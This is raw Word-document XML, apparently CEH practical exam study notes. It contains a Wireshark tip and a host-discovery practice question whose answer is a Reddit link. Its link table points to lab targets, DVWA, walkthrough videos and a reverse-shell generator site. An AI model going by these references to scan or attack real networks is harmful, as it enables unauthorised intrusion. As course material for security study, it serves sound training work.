      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="56698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2B7B99F" w:rsidR="5669829B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5669829B" w:rsidRDefault="5669829B" w14:paraId="7782D310" w14:textId="5B3348EF">
      <w:r w:rsidR="5669829B">
        <w:rPr/>
        <w:t>-&gt; statics-&gt;conversation-&gt;ipv4-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="22CC924B">
        <w:rPr/>
        <w:t xml:space="preserve">number of machines </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22CC924B" w:rsidRDefault="22CC924B" w14:paraId="4C5928E2" w14:textId="1F3DBED7">
      <w:r w:rsidR="22CC924B">
        <w:drawing>
          <wp:inline wp14:editId="6EBD17D6" wp14:anchorId="6B392941">
            <wp:extent cx="5943600" cy="2686050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2129415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8a1315055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4EB02" w:rsidRDefault="52F4EB02" w14:paraId="411083BB" w14:textId="4C455EC2"/>
    <w:p w:rsidR="1170652C" w:rsidRDefault="1170652C" w14:paraId="1B2C30AE" w14:textId="51EE5B83">
      <w:r w:rsidR="1170652C">
        <w:rPr/>
        <w:t>Recong</w:t>
      </w:r>
      <w:r w:rsidR="1170652C">
        <w:rPr/>
        <w:t xml:space="preserve"> iLab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="774CFE0F" w:rsidP="7D8AFB5D" w:rsidRDefault="774CFE0F" w14:paraId="35545F1C" w14:textId="52D8569A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D8AFB5D" w:rsidR="774CFE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Identify the number of live machines in 172.16.0.0/24 subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="774CFE0F" w:rsidP="7D8AFB5D" w:rsidRDefault="774CFE0F" w14:paraId="0E76F9F8" w14:textId="73145844">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="774CFE0F">
        <w:rPr/>
        <w:t xml:space="preserve">Ans: </w:t>
      </w:r>
      <w:hyperlink r:id="Rf661ccb9a9bd4ef2">
        <w:r w:rsidRPr="7D8AFB5D" w:rsidR="774CFE0F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https://www.reddit.com/r/CEH/comments/12yr7cd/ceh_practical_host_discovery_question/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7D8AFB5D" w:rsidRDefault="7D8AFB5D" w14:paraId="5C9D4F61" w14:textId="2F0EAAEB"/>
    <w:p w:rsidR="52F4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="2925266D" w14:textId="56FE31C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2F4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="0A6F7411" w14:textId="61CCAD1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VDs1eApRTSoGu" int2:id="rSZn6UYQ">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="VaD0ynp3HN3D4a" int2:id="nCu8f1LY">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="mJEKbprnp1Plpj" int2:id="LMQq9FUM">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="LVqCnE4z/eEF9t" int2:id="uFDt1EnD">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="b5ua881ui4pzws" int2:id="J7BAjN5a">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="DSXNobgYouUNRX" int2:id="ADRn8U3u">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="aqWkViTTojEf/2" int2:id="vDqdr3Jy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35848e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c87aa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80398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567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65647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ccf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e1fc5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55cbd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AF9A06"/>
    <w:rsid w:val="002DD3A1"/>
    <w:rsid w:val="002EFF57"/>
    <w:rsid w:val="003011E7"/>
    <w:rsid w:val="003DD93F"/>
    <w:rsid w:val="0090B53B"/>
    <w:rsid w:val="00ED59B5"/>
    <w:rsid w:val="0113E647"/>
    <w:rsid w:val="025890C1"/>
    <w:rsid w:val="02CFB068"/>
    <w:rsid w:val="0349FBAF"/>
    <w:rsid w:val="03875348"/>
    <w:rsid w:val="038E1041"/>
    <w:rsid w:val="03FEF217"/>
    <w:rsid w:val="04034DAC"/>
    <w:rsid w:val="0428D68F"/>
    <w:rsid w:val="04E0BEBD"/>
    <w:rsid w:val="055CDA23"/>
    <w:rsid w:val="05677F9F"/>
    <w:rsid w:val="067E1A6E"/>
    <w:rsid w:val="067E36B0"/>
    <w:rsid w:val="06950B94"/>
    <w:rsid w:val="06B3F2AA"/>
    <w:rsid w:val="07826A93"/>
    <w:rsid w:val="07D0FE94"/>
    <w:rsid w:val="07E71D25"/>
    <w:rsid w:val="08569326"/>
    <w:rsid w:val="08938B3A"/>
    <w:rsid w:val="08BE8E6C"/>
    <w:rsid w:val="08DD5799"/>
    <w:rsid w:val="09B42539"/>
    <w:rsid w:val="09FD1F50"/>
    <w:rsid w:val="0A89BD2D"/>
    <w:rsid w:val="0B7D5088"/>
    <w:rsid w:val="0C380BB7"/>
    <w:rsid w:val="0C3FB3FB"/>
    <w:rsid w:val="0CE2BB63"/>
    <w:rsid w:val="0D09F652"/>
    <w:rsid w:val="0D61EE9E"/>
    <w:rsid w:val="0DF63B49"/>
    <w:rsid w:val="0E28BFC5"/>
    <w:rsid w:val="0E33E818"/>
    <w:rsid w:val="0E9749AE"/>
    <w:rsid w:val="0EAD5488"/>
    <w:rsid w:val="0EB5D648"/>
    <w:rsid w:val="0EB844C8"/>
    <w:rsid w:val="0EE356D1"/>
    <w:rsid w:val="0F029C2F"/>
    <w:rsid w:val="0F04A95D"/>
    <w:rsid w:val="0F059C10"/>
    <w:rsid w:val="0F31CFA1"/>
    <w:rsid w:val="0F3231F9"/>
    <w:rsid w:val="0F4BE36B"/>
    <w:rsid w:val="0F59436F"/>
    <w:rsid w:val="0F7DE9D7"/>
    <w:rsid w:val="0F9BF63A"/>
    <w:rsid w:val="1019999E"/>
    <w:rsid w:val="103C919E"/>
    <w:rsid w:val="10706288"/>
    <w:rsid w:val="10CE908E"/>
    <w:rsid w:val="111B3975"/>
    <w:rsid w:val="1127EB70"/>
    <w:rsid w:val="11288881"/>
    <w:rsid w:val="1170652C"/>
    <w:rsid w:val="119A65CA"/>
    <w:rsid w:val="11C1122C"/>
    <w:rsid w:val="11D610A1"/>
    <w:rsid w:val="12680D90"/>
    <w:rsid w:val="12B6EBAD"/>
    <w:rsid w:val="130665F7"/>
    <w:rsid w:val="131E9EEA"/>
    <w:rsid w:val="1343BAC4"/>
    <w:rsid w:val="134E5368"/>
    <w:rsid w:val="13506897"/>
    <w:rsid w:val="14129D87"/>
    <w:rsid w:val="142A8584"/>
    <w:rsid w:val="142DA047"/>
    <w:rsid w:val="14440551"/>
    <w:rsid w:val="14D7DDF8"/>
    <w:rsid w:val="14DC3202"/>
    <w:rsid w:val="14E1DE05"/>
    <w:rsid w:val="152BE87B"/>
    <w:rsid w:val="15FA7F23"/>
    <w:rsid w:val="160437AC"/>
    <w:rsid w:val="1646CC80"/>
    <w:rsid w:val="165605BA"/>
    <w:rsid w:val="167A7255"/>
    <w:rsid w:val="17261642"/>
    <w:rsid w:val="1750512B"/>
    <w:rsid w:val="18351ACF"/>
    <w:rsid w:val="183DF0E7"/>
    <w:rsid w:val="184CEC7A"/>
    <w:rsid w:val="1863BA55"/>
    <w:rsid w:val="194B8651"/>
    <w:rsid w:val="1A5A362E"/>
    <w:rsid w:val="1AC5F327"/>
    <w:rsid w:val="1AD2C26A"/>
    <w:rsid w:val="1B8589B5"/>
    <w:rsid w:val="1BB6D6C8"/>
    <w:rsid w:val="1C09DF89"/>
    <w:rsid w:val="1C514DF6"/>
    <w:rsid w:val="1CDF3E49"/>
    <w:rsid w:val="1CECEDCF"/>
    <w:rsid w:val="1D04BA19"/>
    <w:rsid w:val="1D2DB878"/>
    <w:rsid w:val="1D5DD488"/>
    <w:rsid w:val="1E312AF3"/>
    <w:rsid w:val="1EDF9E85"/>
    <w:rsid w:val="1FA6C8AA"/>
    <w:rsid w:val="1FE7686E"/>
    <w:rsid w:val="2023402C"/>
    <w:rsid w:val="2058276B"/>
    <w:rsid w:val="20BD7828"/>
    <w:rsid w:val="211A0C0A"/>
    <w:rsid w:val="212CFC39"/>
    <w:rsid w:val="213BA290"/>
    <w:rsid w:val="214B6A91"/>
    <w:rsid w:val="21D2E907"/>
    <w:rsid w:val="221A340C"/>
    <w:rsid w:val="2239D723"/>
    <w:rsid w:val="22623A1E"/>
    <w:rsid w:val="22B7B99F"/>
    <w:rsid w:val="22CC924B"/>
    <w:rsid w:val="22EE70BE"/>
    <w:rsid w:val="22FC3C08"/>
    <w:rsid w:val="23073585"/>
    <w:rsid w:val="232FA082"/>
    <w:rsid w:val="2354D4AD"/>
    <w:rsid w:val="236A77DB"/>
    <w:rsid w:val="23B7E32C"/>
    <w:rsid w:val="23D2966E"/>
    <w:rsid w:val="240553EB"/>
    <w:rsid w:val="2493093C"/>
    <w:rsid w:val="24A030E9"/>
    <w:rsid w:val="25C46C05"/>
    <w:rsid w:val="25D4D52A"/>
    <w:rsid w:val="260BBC13"/>
    <w:rsid w:val="26253379"/>
    <w:rsid w:val="26424B60"/>
    <w:rsid w:val="26F2F2C5"/>
    <w:rsid w:val="2704B413"/>
    <w:rsid w:val="2707563C"/>
    <w:rsid w:val="27405BEF"/>
    <w:rsid w:val="278E0124"/>
    <w:rsid w:val="27EB7BD2"/>
    <w:rsid w:val="27F27710"/>
    <w:rsid w:val="2800FA6E"/>
    <w:rsid w:val="282CB804"/>
    <w:rsid w:val="2874DB5B"/>
    <w:rsid w:val="2951FC59"/>
    <w:rsid w:val="295CD9B8"/>
    <w:rsid w:val="29696506"/>
    <w:rsid w:val="29F0AC0B"/>
    <w:rsid w:val="2A191076"/>
    <w:rsid w:val="2A7E691E"/>
    <w:rsid w:val="2AA9F2D5"/>
    <w:rsid w:val="2AAF1DCA"/>
    <w:rsid w:val="2ADC48FF"/>
    <w:rsid w:val="2B4C25C2"/>
    <w:rsid w:val="2B57E433"/>
    <w:rsid w:val="2B8348B2"/>
    <w:rsid w:val="2C73A38B"/>
    <w:rsid w:val="2C9A5954"/>
    <w:rsid w:val="2CA0E4A5"/>
    <w:rsid w:val="2CCD810A"/>
    <w:rsid w:val="2CE6E6A3"/>
    <w:rsid w:val="2D4714C7"/>
    <w:rsid w:val="2DED1175"/>
    <w:rsid w:val="2E53AFCA"/>
    <w:rsid w:val="2ECE8E05"/>
    <w:rsid w:val="2EFD1E28"/>
    <w:rsid w:val="2F37B5A2"/>
    <w:rsid w:val="2F9883B3"/>
    <w:rsid w:val="2F9D8714"/>
    <w:rsid w:val="2FD634CC"/>
    <w:rsid w:val="30046EA8"/>
    <w:rsid w:val="30AB2E66"/>
    <w:rsid w:val="315FD98B"/>
    <w:rsid w:val="316280AB"/>
    <w:rsid w:val="31A462EB"/>
    <w:rsid w:val="31E1F953"/>
    <w:rsid w:val="32130DCB"/>
    <w:rsid w:val="32236284"/>
    <w:rsid w:val="323F3D64"/>
    <w:rsid w:val="329A75BC"/>
    <w:rsid w:val="32A3A2EB"/>
    <w:rsid w:val="32DCA6F7"/>
    <w:rsid w:val="3307587C"/>
    <w:rsid w:val="332CB71B"/>
    <w:rsid w:val="33671DB6"/>
    <w:rsid w:val="338E58BB"/>
    <w:rsid w:val="345A2D59"/>
    <w:rsid w:val="348DB001"/>
    <w:rsid w:val="34EC45AE"/>
    <w:rsid w:val="35137F73"/>
    <w:rsid w:val="359D4DFE"/>
    <w:rsid w:val="35BB6D75"/>
    <w:rsid w:val="35DDCF76"/>
    <w:rsid w:val="3687D427"/>
    <w:rsid w:val="369A66B9"/>
    <w:rsid w:val="378F70DD"/>
    <w:rsid w:val="37CC345D"/>
    <w:rsid w:val="3807D314"/>
    <w:rsid w:val="386D9D0F"/>
    <w:rsid w:val="38C16875"/>
    <w:rsid w:val="38EEBEC9"/>
    <w:rsid w:val="39224F37"/>
    <w:rsid w:val="39F46457"/>
    <w:rsid w:val="3A3124F6"/>
    <w:rsid w:val="3A886631"/>
    <w:rsid w:val="3AE475D1"/>
    <w:rsid w:val="3B73C934"/>
    <w:rsid w:val="3B776A04"/>
    <w:rsid w:val="3B928D62"/>
    <w:rsid w:val="3B954851"/>
    <w:rsid w:val="3C0FD1C8"/>
    <w:rsid w:val="3C726805"/>
    <w:rsid w:val="3D074322"/>
    <w:rsid w:val="3D3E7AB4"/>
    <w:rsid w:val="3D91A6D1"/>
    <w:rsid w:val="3DE3A058"/>
    <w:rsid w:val="3E1573C8"/>
    <w:rsid w:val="3ECC4D4A"/>
    <w:rsid w:val="3ECF6596"/>
    <w:rsid w:val="3EFFC043"/>
    <w:rsid w:val="3F54558E"/>
    <w:rsid w:val="401C9F62"/>
    <w:rsid w:val="40609E1C"/>
    <w:rsid w:val="40748F66"/>
    <w:rsid w:val="407B2C46"/>
    <w:rsid w:val="410425C1"/>
    <w:rsid w:val="4108F312"/>
    <w:rsid w:val="4122EEDA"/>
    <w:rsid w:val="416D10B4"/>
    <w:rsid w:val="4177CB90"/>
    <w:rsid w:val="418B00B7"/>
    <w:rsid w:val="41A53455"/>
    <w:rsid w:val="41A53E2F"/>
    <w:rsid w:val="41D0BF30"/>
    <w:rsid w:val="42345169"/>
    <w:rsid w:val="4257EF44"/>
    <w:rsid w:val="428DF98F"/>
    <w:rsid w:val="42CCDEDB"/>
    <w:rsid w:val="4394ED1D"/>
    <w:rsid w:val="43B5C84A"/>
    <w:rsid w:val="445D4A41"/>
    <w:rsid w:val="449DF725"/>
    <w:rsid w:val="44D94A6E"/>
    <w:rsid w:val="451E9DB6"/>
    <w:rsid w:val="4537F1BC"/>
    <w:rsid w:val="4564C699"/>
    <w:rsid w:val="45B49D4B"/>
    <w:rsid w:val="45F74499"/>
    <w:rsid w:val="462796B6"/>
    <w:rsid w:val="467A9E02"/>
    <w:rsid w:val="46C426B2"/>
    <w:rsid w:val="47137F57"/>
    <w:rsid w:val="476D49E3"/>
    <w:rsid w:val="47798A82"/>
    <w:rsid w:val="47DFAD2B"/>
    <w:rsid w:val="47EA63B5"/>
    <w:rsid w:val="48197343"/>
    <w:rsid w:val="483A6EA3"/>
    <w:rsid w:val="48464C97"/>
    <w:rsid w:val="48A085AD"/>
    <w:rsid w:val="48AF8448"/>
    <w:rsid w:val="48CDA176"/>
    <w:rsid w:val="493232AF"/>
    <w:rsid w:val="4959EA6C"/>
    <w:rsid w:val="495EC2AE"/>
    <w:rsid w:val="4986395C"/>
    <w:rsid w:val="49C065B3"/>
    <w:rsid w:val="49CB6D2C"/>
    <w:rsid w:val="49DD78D6"/>
    <w:rsid w:val="4ACBF88B"/>
    <w:rsid w:val="4AF32675"/>
    <w:rsid w:val="4AF6990A"/>
    <w:rsid w:val="4B370208"/>
    <w:rsid w:val="4B4974C7"/>
    <w:rsid w:val="4B5FC98F"/>
    <w:rsid w:val="4BB4E175"/>
    <w:rsid w:val="4C21946A"/>
    <w:rsid w:val="4C67F128"/>
    <w:rsid w:val="4CA43811"/>
    <w:rsid w:val="4CAF42F3"/>
    <w:rsid w:val="4CBD5A1F"/>
    <w:rsid w:val="4CC0B5BE"/>
    <w:rsid w:val="4D972EF2"/>
    <w:rsid w:val="4DC2BC80"/>
    <w:rsid w:val="4DF88878"/>
    <w:rsid w:val="4E09A5E5"/>
    <w:rsid w:val="4E63F083"/>
    <w:rsid w:val="4E6E6093"/>
    <w:rsid w:val="4EB26D44"/>
    <w:rsid w:val="4EBDE818"/>
    <w:rsid w:val="4F4044B8"/>
    <w:rsid w:val="4F62D67E"/>
    <w:rsid w:val="4FD4B0DD"/>
    <w:rsid w:val="4FF97FDF"/>
    <w:rsid w:val="4FFE1CFF"/>
    <w:rsid w:val="504C90DD"/>
    <w:rsid w:val="507DE7AC"/>
    <w:rsid w:val="5091757D"/>
    <w:rsid w:val="50D6937A"/>
    <w:rsid w:val="511BC0F2"/>
    <w:rsid w:val="511FB87C"/>
    <w:rsid w:val="512C37B5"/>
    <w:rsid w:val="515EB511"/>
    <w:rsid w:val="5183126B"/>
    <w:rsid w:val="51928825"/>
    <w:rsid w:val="522ADCE2"/>
    <w:rsid w:val="5266223E"/>
    <w:rsid w:val="527A1752"/>
    <w:rsid w:val="52DD6D50"/>
    <w:rsid w:val="52F4EB02"/>
    <w:rsid w:val="52F8F8D4"/>
    <w:rsid w:val="53051904"/>
    <w:rsid w:val="5313D94A"/>
    <w:rsid w:val="53261FC2"/>
    <w:rsid w:val="5370CCDF"/>
    <w:rsid w:val="5396A464"/>
    <w:rsid w:val="5409C7DB"/>
    <w:rsid w:val="54C03CFE"/>
    <w:rsid w:val="5573EC9D"/>
    <w:rsid w:val="564B2323"/>
    <w:rsid w:val="565C100D"/>
    <w:rsid w:val="5669829B"/>
    <w:rsid w:val="569C5F5F"/>
    <w:rsid w:val="56CE40B1"/>
    <w:rsid w:val="56F1858A"/>
    <w:rsid w:val="5707CEE3"/>
    <w:rsid w:val="5708E7CF"/>
    <w:rsid w:val="57537D88"/>
    <w:rsid w:val="57713CA2"/>
    <w:rsid w:val="5775CF5E"/>
    <w:rsid w:val="5787A77D"/>
    <w:rsid w:val="579201F8"/>
    <w:rsid w:val="58BF3357"/>
    <w:rsid w:val="5986259D"/>
    <w:rsid w:val="5A2E16F6"/>
    <w:rsid w:val="5A545152"/>
    <w:rsid w:val="5AE0CED3"/>
    <w:rsid w:val="5AFC71E7"/>
    <w:rsid w:val="5B0455F2"/>
    <w:rsid w:val="5B41B8E8"/>
    <w:rsid w:val="5B52021F"/>
    <w:rsid w:val="5BE25FA4"/>
    <w:rsid w:val="5BE4017B"/>
    <w:rsid w:val="5BF0D242"/>
    <w:rsid w:val="5C7D3A46"/>
    <w:rsid w:val="5CBA967B"/>
    <w:rsid w:val="5DA2E903"/>
    <w:rsid w:val="5DD3D8B5"/>
    <w:rsid w:val="5E1ABBAF"/>
    <w:rsid w:val="5E345E0D"/>
    <w:rsid w:val="5E3670DE"/>
    <w:rsid w:val="5E56C532"/>
    <w:rsid w:val="5E5A1F61"/>
    <w:rsid w:val="5E5F50AF"/>
    <w:rsid w:val="5EA58A74"/>
    <w:rsid w:val="5EAA250D"/>
    <w:rsid w:val="5EBB7B0A"/>
    <w:rsid w:val="5F58F9A0"/>
    <w:rsid w:val="5F76645B"/>
    <w:rsid w:val="5F837807"/>
    <w:rsid w:val="5F9236F0"/>
    <w:rsid w:val="5FB9673F"/>
    <w:rsid w:val="5FCB1118"/>
    <w:rsid w:val="6027ED2A"/>
    <w:rsid w:val="607390A4"/>
    <w:rsid w:val="60B9D5A8"/>
    <w:rsid w:val="60EBE788"/>
    <w:rsid w:val="6128F049"/>
    <w:rsid w:val="614C8DF4"/>
    <w:rsid w:val="619BB7BA"/>
    <w:rsid w:val="61BB7B7D"/>
    <w:rsid w:val="620074DA"/>
    <w:rsid w:val="62524DA7"/>
    <w:rsid w:val="6274BE2C"/>
    <w:rsid w:val="62CE3349"/>
    <w:rsid w:val="62F35F50"/>
    <w:rsid w:val="6407A7BE"/>
    <w:rsid w:val="641CCE50"/>
    <w:rsid w:val="646E6D27"/>
    <w:rsid w:val="64F9ECAB"/>
    <w:rsid w:val="660C474E"/>
    <w:rsid w:val="660D3E70"/>
    <w:rsid w:val="6634F846"/>
    <w:rsid w:val="6665E293"/>
    <w:rsid w:val="66696C50"/>
    <w:rsid w:val="668D5114"/>
    <w:rsid w:val="6697E0D6"/>
    <w:rsid w:val="66DAED2B"/>
    <w:rsid w:val="67FBC5F7"/>
    <w:rsid w:val="68066B62"/>
    <w:rsid w:val="681BBB08"/>
    <w:rsid w:val="686DDB69"/>
    <w:rsid w:val="68AB0A08"/>
    <w:rsid w:val="68B6B49B"/>
    <w:rsid w:val="69409029"/>
    <w:rsid w:val="69DAFAA1"/>
    <w:rsid w:val="69EEB4F8"/>
    <w:rsid w:val="6A132C07"/>
    <w:rsid w:val="6A836F63"/>
    <w:rsid w:val="6A9E6645"/>
    <w:rsid w:val="6AA34534"/>
    <w:rsid w:val="6AEDC877"/>
    <w:rsid w:val="6B6332D8"/>
    <w:rsid w:val="6B6D4D19"/>
    <w:rsid w:val="6B801859"/>
    <w:rsid w:val="6B9A2697"/>
    <w:rsid w:val="6BBA7065"/>
    <w:rsid w:val="6BDE7B0F"/>
    <w:rsid w:val="6C20A9F2"/>
    <w:rsid w:val="6C38A0C5"/>
    <w:rsid w:val="6D7F42BC"/>
    <w:rsid w:val="6DBF0C0C"/>
    <w:rsid w:val="6E530E82"/>
    <w:rsid w:val="6E5446F7"/>
    <w:rsid w:val="6E5DE8D1"/>
    <w:rsid w:val="6E793A53"/>
    <w:rsid w:val="6E9D10BB"/>
    <w:rsid w:val="6F612A82"/>
    <w:rsid w:val="6FA99FB5"/>
    <w:rsid w:val="70537E6E"/>
    <w:rsid w:val="70E2B2EA"/>
    <w:rsid w:val="70E85980"/>
    <w:rsid w:val="710BD7F2"/>
    <w:rsid w:val="71927A2D"/>
    <w:rsid w:val="71AF9A06"/>
    <w:rsid w:val="72AD8562"/>
    <w:rsid w:val="72CB77AB"/>
    <w:rsid w:val="72E3479E"/>
    <w:rsid w:val="731EFD25"/>
    <w:rsid w:val="733744C0"/>
    <w:rsid w:val="7339B8A7"/>
    <w:rsid w:val="73753C93"/>
    <w:rsid w:val="73B2974B"/>
    <w:rsid w:val="73E13C27"/>
    <w:rsid w:val="742004D5"/>
    <w:rsid w:val="74804CE5"/>
    <w:rsid w:val="74816DB4"/>
    <w:rsid w:val="751D33C8"/>
    <w:rsid w:val="7522E7AB"/>
    <w:rsid w:val="75B25484"/>
    <w:rsid w:val="768D5350"/>
    <w:rsid w:val="76BBEFD8"/>
    <w:rsid w:val="76D1318C"/>
    <w:rsid w:val="774CFE0F"/>
    <w:rsid w:val="77B52BD8"/>
    <w:rsid w:val="77DA1E42"/>
    <w:rsid w:val="796AD552"/>
    <w:rsid w:val="79908C3F"/>
    <w:rsid w:val="799F410A"/>
    <w:rsid w:val="79BB9610"/>
    <w:rsid w:val="79DD9B4E"/>
    <w:rsid w:val="79EABD8B"/>
    <w:rsid w:val="79EDC2CF"/>
    <w:rsid w:val="7AB18254"/>
    <w:rsid w:val="7AE1C3F1"/>
    <w:rsid w:val="7B04D0FF"/>
    <w:rsid w:val="7C0E08BE"/>
    <w:rsid w:val="7CF9059E"/>
    <w:rsid w:val="7D3A01D1"/>
    <w:rsid w:val="7D8A481C"/>
    <w:rsid w:val="7D8AFB5D"/>
    <w:rsid w:val="7DF47791"/>
    <w:rsid w:val="7E01FA89"/>
    <w:rsid w:val="7FAB593E"/>
    <w:rsid w:val="7FAEC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F9A06"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF63FDA1-84BC-45C0-80DD-9726760F26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07390A4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CC0B5B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4010132f478543b4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.certifiedhacker.com/" TargetMode="External" Id="R53ff82d5747240e9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="R5a6ff6f9122e471e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="Rbf7ad88b2ac24458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R24f711b46d154ccc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cehorg.com/" TargetMode="External" Id="Rb8876886024e477c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R6d7137afb8464b5d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cehorg.com/" TargetMode="External" Id="Rfc8f474bdbbf4b39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.55:8080" TargetMode="External" Id="R6dbd08a6ffeb4cc6" /><Relationship Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml" Id="R493c1a5cbabb432a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=Ok0RRJpm86k&amp;t=3948s&amp;ab_channel=FireShark" TargetMode="External" Id="R50a2c1b3dbb84df9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.44.32:8080/DVWA" TargetMode="External" Id="R5a5129d3ab224e7c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R5d9c5d168b7e47a2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External" Id="R0c81e6906bae4c51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="Rf0965207d06f4ce5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberchef.io/" TargetMode="External" Id="Rd023e300604a406e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="R27fd96e0c1df4136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=eROZzRy-Hso&amp;t=360s&amp;ab_channel=FireShark" TargetMode="External" Id="Re2503213436e4f05" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="Rb6c25c11adb644b4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=eROZzRy-Hso&amp;t=360s&amp;ab_channel=FireShark" TargetMode="External" Id="Ra4ac9246331641b0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="Re71d8504452b41c8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="Rd64a67310dd74423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="R80326bbb9a504c1b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="Rc764a23a95974967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="R118665400ce44ac1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=aNHW1A_rpNs&amp;list=PLZEA2EJpqSWfouVNPkl37AWEVCj6A2mdz&amp;index=5&amp;ab_channel=ThePentesterGuy" TargetMode="External" Id="R1eb82a196bd04fb9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="R64583bff633b4170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="Ree81c74397734374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="R23dabd72a649443e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="R146e96127fd440f3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="Rec61b90a5a234fd1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=IUO9gA14Q0c&amp;ab_channel=FireShark" TargetMode="External" Id="R2739228f168d4938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="R4a99fea2bcdd4163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image14.png" Id="R09f477bde7204372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="Ra4d0431f6139442d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="Re278a131505541ee" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reddit.com/r/CEH/comments/12yr7cd/ceh_practical_host_discovery_question/" TargetMode="External" Id="Rf661ccb9a9bd4ef2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.certifiedhacker.com/" TargetMode="External" Id="R588c8440fb7f4e36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 